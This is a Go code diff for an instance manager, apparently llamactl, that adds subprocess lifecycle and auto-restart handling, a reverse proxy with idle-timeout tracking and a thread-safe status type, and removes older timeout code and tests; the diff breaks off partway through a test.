@@ -0,0 +1,428 @@
package instance
import (
"context"
"fmt"
"io"
"log"
"net/http"
"os"
"os/exec"
"runtime"
"sync"
"syscall"
"time"
)
// process manages the OS process lifecycle for a local instance.
// process owns its complete lifecycle including auto-restart logic.
type process struct {
instance *Instance // Back-reference for SetStatus, GetOptions
// mu is taken by start, stop, restart and monitorProcess while they update
// the fields below.
mu sync.RWMutex
// cmd is the command of the most recent start; ctx/cancel are created in
// start and ctx is the context handed to exec.CommandContext.
cmd *exec.Cmd
ctx context.Context
cancel context.CancelFunc
// stdout/stderr are the subprocess pipes passed to the logger's readOutput.
stdout io.ReadCloser
stderr io.ReadCloser
// restarts counts auto-restart attempts; it is reset on a manual start.
restarts int
// restartCancel is set while an auto-restart is pending; start treats a
// non-nil value as "this start is an auto-restart".
restartCancel context.CancelFunc
// monitorDone is created in start and closed by monitorProcess when it ends.
monitorDone chan struct{}
}
// newProcess returns a process component bound to the given instance.
// Nothing is started; every other field is left at its zero value.
func newProcess(instance *Instance) *process {
	proc := new(process)
	proc.instance = instance
	return proc
}
// start starts the OS process and returns an error if it fails.
//
// It refuses to start an instance that is already running or has no options.
// On success the instance is marked Running and three goroutines are spawned:
// one reader per output pipe and the process monitor. On any failure after
// the log file was opened, the log file is closed and the command context is
// released so a failed start leaves nothing behind.
func (p *process) start() error {
	p.mu.Lock()
	defer p.mu.Unlock()

	if p.instance.IsRunning() {
		return fmt.Errorf("instance %s is already running", p.instance.Name)
	}

	// Safety check: ensure options are valid
	if p.instance.options == nil {
		return fmt.Errorf("instance %s has no options set", p.instance.Name)
	}

	// Reset restart counter when manually starting (not during auto-restart)
	// We can detect auto-restart by checking if restartCancel is set
	if p.restartCancel == nil {
		p.restarts = 0
	}

	// Initialize last request time to current time when starting
	if p.instance.proxy != nil {
		p.instance.proxy.updateLastRequestTime()
	}

	// Create context before building command (needed for CommandContext)
	p.ctx, p.cancel = context.WithCancel(context.Background())

	// Create log files
	if err := p.instance.logger.create(); err != nil {
		p.cancel()
		return fmt.Errorf("failed to create log files: %w", err)
	}

	// fail releases everything acquired so far and passes the error through.
	// Without it, a failed buildCommand or cmd.Start left the log file open.
	fail := func(err error) error {
		p.cancel()
		p.instance.logger.close()
		return err
	}

	// Build command using backend-specific methods
	cmd, cmdErr := p.buildCommand()
	if cmdErr != nil {
		return fail(fmt.Errorf("failed to build command: %w", cmdErr))
	}
	p.cmd = cmd

	if runtime.GOOS != "windows" {
		setProcAttrs(p.cmd)
	}

	var err error
	p.stdout, err = p.cmd.StdoutPipe()
	if err != nil {
		return fail(fmt.Errorf("failed to get stdout pipe: %w", err))
	}
	p.stderr, err = p.cmd.StderrPipe()
	if err != nil {
		p.stdout.Close()
		return fail(fmt.Errorf("failed to get stderr pipe: %w", err))
	}

	// exec.Cmd.Start closes the pipes itself when it fails
	if err := p.cmd.Start(); err != nil {
		return fail(fmt.Errorf("failed to start instance %s: %w", p.instance.Name, err))
	}

	p.instance.SetStatus(Running)

	// Create channel for monitor completion signaling
	p.monitorDone = make(chan struct{})

	go p.instance.logger.readOutput(p.stdout)
	go p.instance.logger.readOutput(p.stderr)
	go p.monitorProcess()

	return nil
}
// stop terminates the subprocess without restarting.
//
// Sequence: cancel any pending auto-restart, mark the instance ShuttingDown,
// wait up to 30 seconds for in-flight requests to drain, mark it Stopped,
// send SIGINT, then wait up to 30 seconds for the monitor goroutine before
// force killing the process.
//
// Returns an error only when the instance is not running.
func (p *process) stop() error {
	p.mu.Lock()

	if !p.instance.IsRunning() {
		// Even if not running, cancel any pending restart
		if p.restartCancel != nil {
			p.restartCancel()
			p.restartCancel = nil
			log.Printf("Cancelled pending restart for instance %s", p.instance.Name)
		}
		p.mu.Unlock()
		return fmt.Errorf("instance %s is not running", p.instance.Name)
	}

	// Cancel any pending restart
	if p.restartCancel != nil {
		p.restartCancel()
		p.restartCancel = nil
	}

	// Set status to ShuttingDown first to reject new requests
	p.instance.SetStatus(ShuttingDown)

	// Snapshot the command and the monitor channel while the lock is held.
	// The drain below can take up to 30 seconds; reading p.cmd afterwards
	// without the lock would race with start() and could signal a process
	// this call never meant to stop.
	monitorDone := p.monitorDone
	cmd := p.cmd
	p.mu.Unlock()

	// Wait for inflight requests to complete (max 30 seconds)
	log.Printf("Instance %s shutting down, waiting for inflight requests to complete...", p.instance.Name)
	deadline := time.Now().Add(30 * time.Second)
	for time.Now().Before(deadline) {
		if p.instance.GetInflightRequests() == 0 {
			break
		}
		time.Sleep(100 * time.Millisecond)
	}

	// Now set status to stopped to signal intentional stop
	p.instance.SetStatus(Stopped)

	// Stop the process with SIGINT if cmd exists
	if cmd != nil && cmd.Process != nil {
		if err := cmd.Process.Signal(syscall.SIGINT); err != nil {
			log.Printf("Failed to send SIGINT to instance %s: %v", p.instance.Name, err)
		}
	}

	// If no process exists, we can return immediately
	if cmd == nil || monitorDone == nil {
		p.instance.logger.close()
		return nil
	}

	select {
	case <-monitorDone:
		// Process exited normally
		log.Printf("Instance %s shut down gracefully", p.instance.Name)
	case <-time.After(30 * time.Second):
		// Force kill if it doesn't exit within 30 seconds
		if cmd.Process != nil {
			if killErr := cmd.Process.Kill(); killErr != nil {
				log.Printf("Failed to force kill instance %s: %v", p.instance.Name, killErr)
			}
			log.Printf("Instance %s did not stop in time, force killed", p.instance.Name)

			// Wait a bit more for the monitor to finish after force kill
			select {
			case <-monitorDone:
				// Monitor completed after force kill
			case <-time.After(2 * time.Second):
				log.Printf("Warning: Monitor goroutine did not complete after force kill for instance %s", p.instance.Name)
			}
		}
	}

	p.instance.logger.close()
	return nil
}
// restart performs a manual restart: stop (tolerating "not running"), reset
// the auto-restart counter, then start again.
//
// The "not running" case is recognised by comparing the error text returned
// by stop; any other stop error aborts the restart.
func (p *process) restart() error {
	if stopErr := p.stop(); stopErr != nil {
		notRunning := fmt.Sprintf("instance %s is not running", p.instance.Name)
		if stopErr.Error() != notRunning {
			return fmt.Errorf("failed to stop instance during restart: %w", stopErr)
		}
		// Not running is fine - fall through and just start it
	}

	// A manual restart starts with a fresh auto-restart budget
	p.mu.Lock()
	p.restarts = 0
	p.mu.Unlock()

	return p.start()
}
// waitForHealthy polls http://<host>:<port>/health until it answers 200 OK
// or the timeout (in seconds) elapses. A non-positive timeout falls back to
// 30 seconds. It returns an error when the instance is not running or does
// not become healthy in time.
func (p *process) waitForHealthy(timeout int) error {
	if !p.instance.IsRunning() {
		return fmt.Errorf("instance %s is not running", p.instance.Name)
	}

	if timeout <= 0 {
		timeout = 30 // Default to 30 seconds if no timeout is specified
	}

	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
	defer cancel()

	// Host and port come from the instance's options
	host := p.instance.options.GetHost()
	port := p.instance.options.GetPort()
	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)

	// Dedicated client so every probe is capped at 5 seconds
	client := &http.Client{Timeout: 5 * time.Second}

	// probe performs one GET and reports whether the backend answered 200 OK
	probe := func() bool {
		req, reqErr := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
		if reqErr != nil {
			return false
		}
		resp, doErr := client.Do(req)
		if doErr != nil {
			return false
		}
		defer resp.Body.Close()
		return resp.StatusCode == http.StatusOK
	}

	// One immediate attempt before falling back to polling once per second
	if probe() {
		return nil
	}

	ticker := time.NewTicker(1 * time.Second)
	defer ticker.Stop()

	for {
		select {
		case <-ticker.C:
			if probe() {
				return nil
			}
		case <-ctx.Done():
			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", p.instance.Name, timeout)
		}
	}
}
// monitorProcess monitors the OS process and handles crashes/exits.
//
// An exit observed while the instance is no longer marked running is treated
// as intentional and ignored. Otherwise the instance is marked Stopped, the
// logger is closed and, when the process exited with an error, the
// auto-restart logic runs. The run's monitorDone channel is closed when this
// function returns.
func (p *process) monitorProcess() {
	// Snapshot the command and completion channel that belong to THIS run.
	// handleAutoRestart may call start() before this function returns, which
	// replaces p.cmd and p.monitorDone; the deferred cleanup must not close
	// the channel of the freshly started process (stop() would then see a nil
	// channel and return without waiting for, or force killing, the process).
	p.mu.RLock()
	cmd := p.cmd
	done := p.monitorDone
	p.mu.RUnlock()

	defer func() {
		p.mu.Lock()
		if done != nil {
			close(done)
		}
		// Only clear the field if it still refers to this run's channel
		if p.monitorDone == done {
			p.monitorDone = nil
		}
		p.mu.Unlock()
	}()

	err := cmd.Wait()

	p.mu.Lock()

	// Check if the instance was intentionally stopped
	if !p.instance.IsRunning() {
		p.mu.Unlock()
		return
	}

	p.instance.SetStatus(Stopped)
	p.instance.logger.close()

	// Cancel any existing restart context since we're handling a new exit
	if p.restartCancel != nil {
		p.restartCancel()
		p.restartCancel = nil
	}

	// Log the exit
	if err != nil {
		log.Printf("Instance %s crashed with error: %v", p.instance.Name, err)
		// handleAutoRestart is entered with the lock held and releases it itself
		p.handleAutoRestart(err)
	} else {
		log.Printf("Instance %s exited cleanly", p.instance.Name)
		p.mu.Unlock()
	}
}
// shouldAutoRestart reports whether an auto-restart is permitted: options
// must exist, AutoRestart must be enabled, MaxRestarts must be set and the
// restart budget must not be exhausted. Every refusal is logged.
func (p *process) shouldAutoRestart() bool {
	opts := p.instance.GetOptions()

	switch {
	case opts == nil:
		log.Printf("Instance %s not restarting: options are nil", p.instance.Name)
	case opts.AutoRestart == nil || !*opts.AutoRestart:
		log.Printf("Instance %s not restarting: AutoRestart is disabled", p.instance.Name)
	case opts.MaxRestarts == nil:
		log.Printf("Instance %s not restarting: MaxRestarts is nil", p.instance.Name)
	case p.restarts >= *opts.MaxRestarts:
		log.Printf("Instance %s exceeded max restart attempts (%d)", p.instance.Name, *opts.MaxRestarts)
	default:
		return true
	}

	return false
}
// handleAutoRestart manages the auto-restart process.
//
// It must be called with p.mu held and always releases the lock before
// returning. When restarting is not permitted the instance is marked Failed.
// Otherwise the instance is marked Restarting, the configured delay is
// awaited (cancellable through p.restartCancel) and start() is called. If
// that start fails the instance is marked Failed instead of being left in
// Restarting indefinitely.
//
// The err parameter (the exit error of the crashed process) is currently
// not used.
func (p *process) handleAutoRestart(err error) {
	// Check if should restart
	if !p.shouldAutoRestart() {
		p.instance.SetStatus(Failed)
		p.mu.Unlock()
		return
	}

	// Get restart parameters
	opts := p.instance.GetOptions()
	if opts.RestartDelay == nil {
		log.Printf("Instance %s not restarting: RestartDelay is nil", p.instance.Name)
		p.instance.SetStatus(Failed)
		p.mu.Unlock()
		return
	}

	delay := time.Duration(*opts.RestartDelay) * time.Second
	maxRestarts := *opts.MaxRestarts

	p.restarts++

	// Set status to Restarting instead of leaving as Stopped
	p.instance.SetStatus(Restarting)

	log.Printf("Auto-restarting instance %s (attempt %d/%d) in %v",
		p.instance.Name, p.restarts, maxRestarts, delay)

	// Create a cancellable context for the restart delay
	restartCtx, cancel := context.WithCancel(context.Background())
	p.restartCancel = cancel

	// Release the lock before sleeping
	p.mu.Unlock()

	// Context-aware sleep; the timer is stopped on return so a cancelled
	// restart does not leave it pending for the rest of the delay.
	timer := time.NewTimer(delay)
	defer timer.Stop()

	select {
	case <-timer.C:
		// Sleep completed normally, continue with restart
	case <-restartCtx.Done():
		// Restart was cancelled
		log.Printf("Restart cancelled for instance %s", p.instance.Name)
		return
	}

	// restartCancel stays set during start() so that start() can tell an
	// auto-restart from a manual start and keep the restart counter.
	startErr := p.start()

	// The delay context has served its purpose: release it and clear the
	// marker whether or not the start succeeded, so a later manual start is
	// not mistaken for an auto-restart.
	p.mu.Lock()
	cancel()
	p.restartCancel = nil
	p.mu.Unlock()

	if startErr != nil {
		log.Printf("Failed to restart instance %s: %v", p.instance.Name, startErr)
		// Nothing will retry from here. Unless something else brought the
		// instance up in the meantime, report the failure instead of leaving
		// the status at Restarting.
		if !p.instance.IsRunning() {
			p.instance.SetStatus(Failed)
		}
		return
	}

	log.Printf("Successfully restarted instance %s", p.instance.Name)
}
// buildCommand assembles the exec.Cmd for this process: the executable and
// arguments come from the instance, the command is bound to p.ctx, and the
// environment is the host environment followed by the instance's variables.
func (p *process) buildCommand() (*exec.Cmd, error) {
	inst := p.instance

	overrides := inst.buildEnvironment()
	executable := inst.getCommand()
	argv := inst.buildCommandArgs()

	cmd := exec.CommandContext(p.ctx, executable, argv...)

	// Host environment first; instance-specific entries are appended after it
	environ := os.Environ()
	for key, value := range overrides {
		environ = append(environ, fmt.Sprintf("%s=%s", key, value))
	}
	cmd.Env = environ

	return cmd, nil
}

234
pkg/instance/proxy.go Normal file
View File

@@ -0,0 +1,234 @@
package instance
import (
"fmt"
"net/http"
"net/http/httputil"
"net/url"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time.
// Implementations return the time that should be treated as "now".
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
// Now returns the current wall-clock time via time.Now.
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// proxy manages HTTP reverse proxy and request tracking for an instance.
// The reverse proxy itself is built lazily, on the first call to get().
type proxy struct {
// instance is the Instance this proxy was created for.
instance *Instance
// targetURL is the upstream address, computed once in newProxy: the remote
// node's address for remote instances, http://host:port otherwise.
targetURL *url.URL
apiKey string // For remote instances
// responseHeaders is only populated for local instances, from the backend
// configuration.
responseHeaders map[string]string
mu sync.RWMutex
// proxy/proxyErr hold the result of the one-time build guarded by proxyOnce.
proxy *httputil.ReverseProxy
proxyOnce sync.Once
proxyErr error
// NOTE(review): presumably the time of the most recent proxied request and
// the number of requests currently in flight - confirm against the methods
// that update them.
lastRequestTime atomic.Int64
inflightRequests atomic.Int32
// timeProvider defaults to realTimeProvider{} in newProxy.
timeProvider TimeProvider
}
// newProxy creates a new proxy for the given instance and resolves its
// target URL up front.
//
// Remote instances target the address of one of their assigned nodes (the
// first one yielded by iterating options.Nodes) and carry that node's API
// key. Local instances target http://host:port taken from the instance
// options and pick up the backend's configured response headers.
//
// An error is returned when the instance has no options, no usable remote
// node, no port, or an unparsable target address.
func newProxy(instance *Instance) (*proxy, error) {
	p := &proxy{
		instance:     instance,
		timeProvider: realTimeProvider{},
	}

	options := instance.GetOptions()
	if options == nil {
		return nil, fmt.Errorf("instance %s has no options set", instance.Name)
	}

	if !instance.IsRemote() {
		// Local instance: host/port come from the instance options
		host := instance.options.GetHost()
		port := instance.options.GetPort()
		if port == 0 {
			return nil, fmt.Errorf("instance %s has no port assigned", instance.Name)
		}

		target, parseErr := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
		if parseErr != nil {
			return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", instance.Name, parseErr)
		}
		p.targetURL = target

		// Get response headers from backend config
		p.responseHeaders = options.BackendOptions.GetResponseHeaders(instance.globalBackendSettings)
		return p, nil
	}

	// Remote instance: take the first remote node as the target for now
	var nodeName string
	for candidate := range options.Nodes {
		nodeName = candidate
		break
	}
	if nodeName == "" {
		return nil, fmt.Errorf("instance %s has no remote nodes defined", instance.Name)
	}

	node, known := instance.globalNodesConfig[nodeName]
	if !known {
		return nil, fmt.Errorf("remote node %s is not defined", nodeName)
	}

	target, parseErr := url.Parse(node.Address)
	if parseErr != nil {
		return nil, fmt.Errorf("failed to parse target URL for remote instance %s: %w", instance.Name, parseErr)
	}
	p.targetURL = target
	p.apiKey = node.APIKey

	return p, nil
}
// get returns the reverse proxy for this instance, building it on first use.
//
// The build runs inside p.proxyOnce, so concurrent callers share a single
// build() call and its result. The read lock is held for the whole call
// because clear() replaces p.proxyOnce and resets p.proxy/p.proxyErr under
// the write lock; without it a concurrent clear() would race with the Once
// and with the field reads in the return statement.
//
// It returns the cached proxy together with the error produced by build().
func (p *proxy) get() (*httputil.ReverseProxy, error) {
	p.mu.RLock()
	defer p.mu.RUnlock()

	// Other callers block inside Do until the first initialization completes.
	p.proxyOnce.Do(func() {
		p.proxy, p.proxyErr = p.build()
	})
	return p.proxy, p.proxyErr
}
// build creates the reverse proxy that forwards to p.targetURL.
//
// Every forwarded request refreshes the last-request timestamp, and requests
// to remote instances get a bearer Authorization header when an API key is
// configured. For local instances the backend's CORS headers are stripped
// from the response and the configured response headers are applied.
// The returned error is always nil.
func (p *proxy) build() (*httputil.ReverseProxy, error) {
	rp := httputil.NewSingleHostReverseProxy(p.targetURL)

	// Wrap the default director so the request is adjusted before it is sent.
	baseDirector := rp.Director
	rp.Director = func(req *http.Request) {
		baseDirector(req)

		if p.instance.IsRemote() && p.apiKey != "" {
			req.Header.Set("Authorization", "Bearer "+p.apiKey)
		}

		p.updateLastRequestTime()
	}

	if p.instance.IsRemote() {
		return rp, nil
	}

	// Backend CORS headers are removed to avoid conflicts; llamactl adds its own.
	backendCORSHeaders := []string{
		"Access-Control-Allow-Origin",
		"Access-Control-Allow-Methods",
		"Access-Control-Allow-Headers",
		"Access-Control-Allow-Credentials",
		"Access-Control-Max-Age",
		"Access-Control-Expose-Headers",
	}
	rp.ModifyResponse = func(resp *http.Response) error {
		for _, header := range backendCORSHeaders {
			resp.Header.Del(header)
		}
		// Apply the custom response headers configured for this backend.
		for name, val := range p.responseHeaders {
			resp.Header.Set(name, val)
		}
		return nil
	}

	return rp, nil
}
// serveHTTP forwards the request through the instance's reverse proxy while
// counting it as inflight for the duration of the call.
//
// It returns the error from get() when the reverse proxy is unavailable; in
// that case nothing is written to w and the inflight counter is untouched.
func (p *proxy) serveHTTP(w http.ResponseWriter, r *http.Request) error {
	handler, err := p.get()
	if err != nil {
		return err
	}

	// The counter is raised only around the actual proxying.
	p.inflightRequests.Add(1)
	defer p.inflightRequests.Add(-1)

	handler.ServeHTTP(w, r)
	return nil
}
// clear drops the cached reverse proxy and re-arms the one-time initializer,
// so the next get() builds a fresh proxy (e.g. after options changed).
func (p *proxy) clear() {
	p.mu.Lock()
	p.proxyOnce = sync.Once{}
	p.proxy, p.proxyErr = nil, nil
	p.mu.Unlock()
}
// updateLastRequestTime records "now" (per the configured time provider) as
// the instance's last request time, stored as Unix seconds.
func (p *proxy) updateLastRequestTime() {
	p.lastRequestTime.Store(p.timeProvider.Now().Unix())
}
// getLastRequestTime reports when the last request was recorded, as Unix
// seconds. The value is zero until updateLastRequestTime has been called.
func (p *proxy) getLastRequestTime() int64 {
	seconds := p.lastRequestTime.Load()
	return seconds
}
// shouldTimeout reports whether the instance has been idle for longer than
// its configured idle timeout.
//
// It returns false when the instance is not running, or when no positive
// IdleTimeout (in minutes) is configured.
func (p *proxy) shouldTimeout() bool {
	if !p.instance.IsRunning() {
		return false
	}

	opts := p.instance.GetOptions()
	if opts == nil {
		return false
	}
	minutes := opts.IdleTimeout
	if minutes == nil || *minutes <= 0 {
		return false
	}

	last := p.lastRequestTime.Load()
	// The timeout is configured in minutes; timestamps are in seconds.
	limitSeconds := int64((*minutes) * 60)
	idleSeconds := p.timeProvider.Now().Unix() - last
	return idleSeconds > limitSeconds
}
// setTimeProvider replaces the clock used for request timestamps and idle
// checks. Intended for tests that need a controllable time source.
func (p *proxy) setTimeProvider(tp TimeProvider) {
	p.timeProvider = tp
}
// incInflightRequests atomically adds one to the inflight request counter.
func (p *proxy) incInflightRequests() {
	const delta int32 = 1
	p.inflightRequests.Add(delta)
}
// decInflightRequests atomically subtracts one from the inflight request counter.
func (p *proxy) decInflightRequests() {
	const delta int32 = -1
	p.inflightRequests.Add(delta)
}
// getInflightRequests reports how many requests are inflight right now,
// read atomically from the counter.
func (p *proxy) getInflightRequests() int32 {
	inflight := p.inflightRequests.Load()
	return inflight
}

View File

@@ -3,48 +3,38 @@ package instance
import (
"encoding/json"
"log"
"sync"
)
// Enum for instance status
type InstanceStatus int
// Status is the enum for status values (exported).
type Status int
const (
Stopped InstanceStatus = iota
Stopped Status = iota
Running
Failed
Restarting
ShuttingDown
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
var nameToStatus = map[string]Status{
"stopped": Stopped,
"running": Running,
"failed": Failed,
"restarting": Restarting,
"shutting_down": ShuttingDown,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
var statusToName = map[Status]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
Restarting: "restarting",
ShuttingDown: "shutting_down",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
// Status enum JSON marshaling methods
func (s Status) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
@@ -52,8 +42,8 @@ func (s InstanceStatus) MarshalJSON() ([]byte, error) {
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
// UnmarshalJSON implements json.Unmarshaler for Status enum
func (s *Status) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
@@ -68,3 +58,61 @@ func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
*s = status
return nil
}
// status represents the instance status with thread-safe access (unexported).
// Reads and writes of s go through mu; see get, set and isRunning.
type status struct {
// mu guards s; set() also reads onStatusChange while holding it.
mu sync.RWMutex
// s is the current status value.
s Status
// Callback for status changes. set() invokes it with the old and new status
// after releasing mu; it is skipped when nil.
onStatusChange func(oldStatus, newStatus Status)
}
// newStatus returns a status wrapper whose current value is initial and
// whose change callback is unset.
func newStatus(initial Status) *status {
	wrapper := new(status)
	wrapper.s = initial
	return wrapper
}
// get returns a snapshot of the current status, taken under the read lock.
func (st *status) get() Status {
	st.mu.RLock()
	current := st.s
	st.mu.RUnlock()
	return current
}
// set stores newStatus and then notifies the onStatusChange callback, if one
// is registered, with the previous and the new value.
func (st *status) set(newStatus Status) {
	st.mu.Lock()
	previous, notify := st.s, st.onStatusChange
	st.s = newStatus
	st.mu.Unlock()

	// The callback runs after the lock is released to avoid potential deadlocks.
	if notify == nil {
		return
	}
	notify(previous, newStatus)
}
// isRunning reports whether the current status equals Running.
func (st *status) isRunning() bool {
	st.mu.RLock()
	running := st.s == Running
	st.mu.RUnlock()
	return running
}
// MarshalJSON implements json.Marshaler for the status wrapper by encoding a
// snapshot of the wrapped Status value.
func (st *status) MarshalJSON() ([]byte, error) {
	st.mu.RLock()
	snapshot := st.s
	st.mu.RUnlock()

	return snapshot.MarshalJSON()
}
// UnmarshalJSON implements json.Unmarshaler for the status wrapper. The
// wrapped Status decodes itself while the write lock is held.
func (st *status) UnmarshalJSON(data []byte) error {
	st.mu.Lock()
	defer st.mu.Unlock()

	wrapped := &st.s
	return wrapped.UnmarshalJSON(data)
}

View File

@@ -1,28 +0,0 @@
package instance
// UpdateLastRequestTime stores the current time (per the instance's time
// provider) as the last request time, in Unix seconds, while holding the
// instance lock.
func (i *Process) UpdateLastRequestTime() {
	i.mu.Lock()
	defer i.mu.Unlock()

	i.lastRequestTime.Store(i.timeProvider.Now().Unix())
}
// ShouldTimeout reports whether the instance has been idle longer than its
// configured IdleTimeout (minutes). It is false for instances that are not
// running or that have no positive idle timeout.
func (i *Process) ShouldTimeout() bool {
	i.mu.RLock()
	defer i.mu.RUnlock()

	if !i.IsRunning() {
		return false
	}
	minutes := i.options.IdleTimeout
	if minutes == nil || *minutes <= 0 {
		return false
	}

	last := i.lastRequestTime.Load()
	// The timeout is configured in minutes; timestamps are in seconds.
	limitSeconds := int64((*minutes) * 60)
	idleSeconds := i.timeProvider.Now().Unix() - last
	return idleSeconds > limitSeconds
}

View File

@@ -1,274 +0,0 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
// TestShouldTimeout_NoTimeoutConfigured verifies that a running instance
// never reports a timeout when IdleTimeout is nil, zero or negative.
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
	backendsCfg := &config.BackendConfig{
		LlamaCpp: config.BackendSettings{Command: "llama-server"},
		MLX:      config.BackendSettings{Command: "mlx_lm.server"},
	}
	instancesCfg := &config.InstancesConfig{LogsDir: "/tmp/test"}

	type disabledCase struct {
		name        string
		idleTimeout *int
	}
	cases := []disabledCase{
		{name: "nil timeout", idleTimeout: nil},
		{name: "zero timeout", idleTimeout: testutil.IntPtr(0)},
		{name: "negative timeout", idleTimeout: testutil.IntPtr(-5)},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			// No-op status change callback
			noopStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}

			opts := &instance.CreateInstanceOptions{
				IdleTimeout: tc.idleTimeout,
				BackendType: backends.BackendTypeLlamaCpp,
				LlamaServerOptions: &llamacpp.LlamaServerOptions{
					Model: "/path/to/model.gguf",
				},
			}
			inst := instance.NewInstance("test-instance", backendsCfg, instancesCfg, opts, noopStatusChange)

			// Pretend the instance is running so only the timeout setting matters.
			inst.SetStatus(instance.Running)

			if timedOut := inst.ShouldTimeout(); timedOut {
				t.Errorf("Instance with %s should not timeout", tc.name)
			}
		})
	}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
// TestTimeoutConfiguration_Validation verifies how NewInstance normalizes the
// IdleTimeout option: the options returned by GetOptions are expected to carry
// a non-nil IdleTimeout equal to expectedTimeout for each input.
func TestTimeoutConfiguration_Validation(t *testing.T) {
	backendConfig := &config.BackendConfig{
		LlamaCpp: config.BackendSettings{
			Command: "llama-server",
		},
		MLX: config.BackendSettings{
			Command: "mlx_lm.server",
		},
	}
	globalSettings := &config.InstancesConfig{
		LogsDir: "/tmp/test",
	}

	tests := []struct {
		name            string
